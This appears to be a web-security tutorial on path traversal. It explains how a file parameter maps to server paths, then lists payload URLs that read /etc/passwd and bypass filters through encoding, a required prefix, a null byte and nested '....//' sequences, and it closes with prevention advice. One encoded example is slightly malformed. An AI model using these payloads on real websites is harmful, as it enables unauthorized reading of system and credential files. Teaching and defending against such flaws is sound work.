Path traversal vulnerability can be easily found on vulnerable websites, which enables attacker to read file’s content, including passwd file, configuration files, database files, etc.

Before understanding the path traversal vulnerability, Let’s just first understand what is “Path” in the terms of web.

As you can see in above image, After the domain or top level domain, Path is specified to serve a specific file to the client.

Now, as we change the path of the URL, we can assess different files stored on server.

Assume: we have a website that serves cats.png file to the client.

https://www.example.com/images?file=cats.png

Now, if the website is running on Linux system, so typically the actual path of the cats.png should be as given below (in general).

/var/www/images/cats.png

Now, to access the sensitive file “/etc/passwd”, we have to go back three directories back and then put “/etc/passwd” in the url

Original url: https://www.example.com/images?file=cats.png
Updated url: https://www.example.com/images?file=../../../etc/passwd

which will show the content of the /etc/passwd file which stores users’ details.

To prevent such type of attacks, website uses various filters. But there are still some ways to bypass those filters. Some techniques are shown below:

1. Use Absolute path:

Try absolute path of the file, instead of relative path:

Try this: https://www.example.com/images?file=/etc/passwd
Instead of this: https://www.example.com/images?file=../../../etc/passwd
Absolute path: /etc/passwd
Relative path: ../../../etc/passwd

2. Use URL-Encoding:

Sometimes server, revomes “../” term from url, but you can use single URL Encoding or even Double URL Encoding.

URL: https://www.example.com/images?file=../../etc/passwd
single url encoded: https://www.example.com/images?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd
double url encoded: https://www.example.com/images?file=%252e%252e%252f%252e%252e%252fetc%252passwd
single encoding of ../ = %2e%2e%2f
double encoding of ../ = %252e%252e%252f

3. Use specific directory path in the url:

Sometimes, server filter like that you must put specific directory in the url to validate it.

URL: https://www.example.com/images?file=/var/www/images/cats.png
Here, /var/www/images/ directory must be present in the url.
In such case,
Try this: https://www.example.com/images?file=/var/www/images/../../../etc/passwd

4. Use specific extension of the file in the url:

Server may filter specific extension of the file, so user can’t steal sensitive data from file. But you can bypass it using “null byte”

URL: https://www.example.com/images?file=cats.png
Here .png must be present in the url.
In such case,
Try this: https://www.example.com/images?file=../../../etc/passwd%00.png

Here, “%00” indicates null byte, which tells to the server that “Ignore the rest of the part of the url after %00” indicating the end of string.

5. Use ….// or ….\/ for traversal

Web server may filter ../ string from the url, but you can use ….// or ….\/ in the url. So even if server strip ../ from the url you can still have another ../ in the url.

URL: https://www.example.com/images?file=....//....//....//etc/passwd
server will strip ../ from the url.
removing http://www.example.com/images?files=.. '../' /.. '../' /.. '../' /etc/passwd
The url will be look after striping: 
https://www.example.com/images?file=../../../etc/passwd

Example:

How to prevent:

• Validate the user input before processing it. Ideally, compare the user input with a whitelist of permitted values. If that isn’t possible, verify that the input contains only permitted content, such as alphanumeric characters only.
• After validating the supplied input, append the input to the base directory and use a platform filesystem API to canonicalize the path. Verify that the canonicalized path starts with the expected base directory.

absolute path: \var\www\images\..\images\cats.png
canonical path: \var\www\images\cats.png